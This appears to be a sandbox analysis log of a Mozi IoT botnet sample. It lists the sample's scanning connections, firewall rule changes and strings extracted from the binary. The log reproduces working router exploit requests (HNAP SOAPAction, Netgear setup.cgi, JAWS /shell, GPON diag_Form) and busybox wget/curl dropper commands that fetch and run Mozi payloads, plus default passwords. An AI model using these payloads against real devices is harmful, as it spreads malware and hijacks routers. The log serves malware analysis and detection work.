              Source: global trafficTCP traffic: 192.168.2.20:42894 -> 169.8.56.140:5555
              Source: global trafficTCP traffic: 192.168.2.20:59034 -> 95.195.140.113:8443
              Source: global trafficTCP traffic: 192.168.2.20:47696 -> 204.31.115.147:8080
              Source: global trafficTCP traffic: 192.168.2.20:59066 -> 40.138.183.204:8080
              Source: global trafficTCP traffic: 192.168.2.20:51500 -> 154.57.107.198:49152
              Source: global trafficTCP traffic: 192.168.2.20:55828 -> 19.76.200.46:49152
              Source: global trafficTCP traffic: 192.168.2.20:49682 -> 122.101.90.140:81
              Source: global trafficTCP traffic: 192.168.2.20:51458 -> 87.162.119.140:37215
              Source: global trafficTCP traffic: 192.168.2.20:33784 -> 176.181.32.218:8080
              Source: global trafficTCP traffic: 192.168.2.20:36488 -> 194.160.179.117:37215
              Source: global trafficTCP traffic: 192.168.2.20:35776 -> 168.222.225.0:49152
              Source: global trafficTCP traffic: 192.168.2.20:41830 -> 55.141.32.238:8080
              Source: global trafficTCP traffic: 192.168.2.20:48042 -> 153.116.121.166:81
              Source: global trafficTCP traffic: 192.168.2.20:38162 -> 122.134.129.152:8443
              Source: global trafficTCP traffic: 192.168.2.20:52448 -> 186.91.75.186:7574
              Source: global trafficTCP traffic: 192.168.2.20:37012 -> 49.143.93.65:52869
              Source: global trafficTCP traffic: 192.168.2.20:56254 -> 50.31.248.176:5555
              Source: global trafficTCP traffic: 192.168.2.20:46686 -> 22.31.234.115:8080
              Source: global trafficTCP traffic: 192.168.2.20:45678 -> 39.179.29.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:34350 -> 177.203.121.240:8080
              Source: global trafficTCP traffic: 192.168.2.20:48980 -> 53.110.221.193:49152
              Source: global trafficTCP traffic: 192.168.2.20:49152 -> 143.43.201.31:7574
              Source: global trafficTCP traffic: 192.168.2.20:46992 -> 42.124.198.47:52869
              Source: global trafficTCP traffic: 192.168.2.20:51302 -> 68.103.167.2:49152
              Source: global trafficTCP traffic: 192.168.2.20:58110 -> 45.46.146.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:40950 -> 44.114.159.0:8080
              Source: global trafficTCP traffic: 192.168.2.20:42496 -> 6.179.235.226:8080
              Source: global trafficTCP traffic: 192.168.2.20:44480 -> 203.133.121.10:37215
              Source: global trafficTCP traffic: 192.168.2.20:51428 -> 157.201.127.64:8443
              Source: global trafficTCP traffic: 192.168.2.20:38854 -> 74.86.38.158:49152
              Source: global trafficTCP traffic: 192.168.2.20:60592 -> 14.247.219.102:37215
              Source: global trafficTCP traffic: 192.168.2.20:46030 -> 70.95.221.241:8080
              Source: global trafficTCP traffic: 192.168.2.20:59406 -> 208.150.175.68:49152
              Source: global trafficTCP traffic: 192.168.2.20:55114 -> 160.12.55.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:42936 -> 134.147.43.174:8443
              Source: global trafficTCP traffic: 192.168.2.20:52754 -> 40.118.219.24:8080
              Source: global trafficTCP traffic: 192.168.2.20:41908 -> 63.12.57.100:8080
              Source: global trafficTCP traffic: 192.168.2.20:56264 -> 74.98.122.143:8080
              Source: global trafficTCP traffic: 192.168.2.20:39558 -> 202.157.106.25:8080
              Source: global trafficTCP traffic: 192.168.2.20:56204 -> 159.153.119.69:8080
              Source: global trafficTCP traffic: 192.168.2.20:51496 -> 84.27.204.184:8080
              Source: global trafficTCP traffic: 192.168.2.20:50812 -> 152.15.88.72:8443
              Source: global trafficTCP traffic: 192.168.2.20:60200 -> 33.177.217.109:8080
              Source: global trafficTCP traffic: 192.168.2.20:51190 -> 11.100.127.8:5555
              Source: global trafficTCP traffic: 192.168.2.20:52832 -> 126.130.202.154:8080
              Source: global trafficTCP traffic: 192.168.2.20:35870 -> 2.9.169.104:8443
              Source: global trafficTCP traffic: 192.168.2.20:59600 -> 171.146.122.140:8443
              Source: global trafficTCP traffic: 192.168.2.20:35460 -> 98.66.36.94:8080
              Source: global trafficTCP traffic: 192.168.2.20:43902 -> 12.24.80.216:7574
              Source: global trafficTCP traffic: 192.168.2.20:34406 -> 16.194.20.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:36742 -> 109.93.120.96:8080
              Source: global trafficTCP traffic: 192.168.2.20:59882 -> 219.181.14.154:81
              Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
              Host: 144.76.43.37:80
              Content-Type: text/xml; charset="utf-8"
              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
              Content-Length: 640
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
                Host: 23.254.64.88:80
                Content-Type: text/xml; charset="utf-8"
                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                Content-Length: 640
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
                Host: 113.161.185.44:80
                Content-Type: text/xml; charset="utf-8"
                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                Content-Length: 640
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0
                Host: 34.66.226.190:80
                Content-Type: text/xml; charset="utf-8"
                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                Content-Length: 640
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: /tmp/mozi.a.zip (PID: 4621) Socket: 0.0.0.0::60120
              Source: unknown TCP traffic detected without corresponding DNS query (numerous destination IP addresses)
              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                Content-Type: text/html
                Content-Encoding: gzip
                Vary: Accept-Encoding
                Server: Microsoft-IIS/7.5
                X-Powered-By: ASP.NET
                Date: Sat, 06 Feb 2021 10:39:02 GMT
                Content-Length: 205
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 175.203.81.2:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 23.217.12.208:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 47.246.22.230:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 159.140.205.214:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 24.239.192.38:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 13.89.231.175:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 193.248.153.76:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 74.79.213.38:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 23.236.242.26:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 23.12.191.118:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                User-Agent: Hello, world
                Host: 180.254.107.55:80
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Connection: keep-alive
              Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
              Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1
                Host: 127.0.0.1:80
                Connection: keep-alive
                Accept-Encoding: gzip, deflate
                Accept: */*
                User-Agent: Hello, World
                Content-Length: 118
                Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=us-ascii
                Server: Microsoft-HTTPAPI/2.0
                Date: Sat, 06 Feb 2021 10:36:20 GMT
                Connection: close
                Content-Length: 315
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.a;chmod
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.a;sh$
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;$
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/bin.sh
              Source: mozi.a.zip String found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: mozi.a.zip String found in binary or memory: http://127.0.0.1
              Source: mozi.a.zip String found in binary or memory: http://127.0.0.1sendcmd
              Source: mozi.a.zip String found in binary or memory: http://HTTP/1.1
              Source: mozi.a.zip String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
              Source: mozi.a.zip String found in binary or memory: http://ipinfo.io/ip
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
              Source: mozi.a.zip String found in binary or memory: http://purenetworks.com/HNAP1/
              Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
              Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php
              Source: /tmp/mozi.a.zip (PID: 4598) HTML file containing JavaScript created: /usr/networks
              Source: Initial sample String containing 'busybox' found: busybox
              Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sample String containing potential weak password found: admin
              Source: Initial sample String containing potential weak password found: default
              Source: Initial sample String containing potential weak password found: support
              Source: Initial sample String containing potential weak password found: service
              Source: Initial sample String containing potential weak password found: supervisor
              Source: Initial sample String containing potential weak password found: guest
              Source: Initial sample String containing potential weak password found: administrator
              Source: Initial sample String containing potential weak password found: 123456
              Source: Initial sample String containing potential weak password found: 54321
              Source: Initial sample String containing potential weak password found: password
              Source: Initial sample String containing potential weak password found: 12345
              Source: Initial sample String containing potential weak password found: admin1234
              Source: Initial samplePotential command found: POST /cdn-cgi/
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
              Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
              Source: Initial samplePotential command found: mount -o remount,rw /overlay /
              Source: Initial samplePotential command found: mv -f %s %s
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
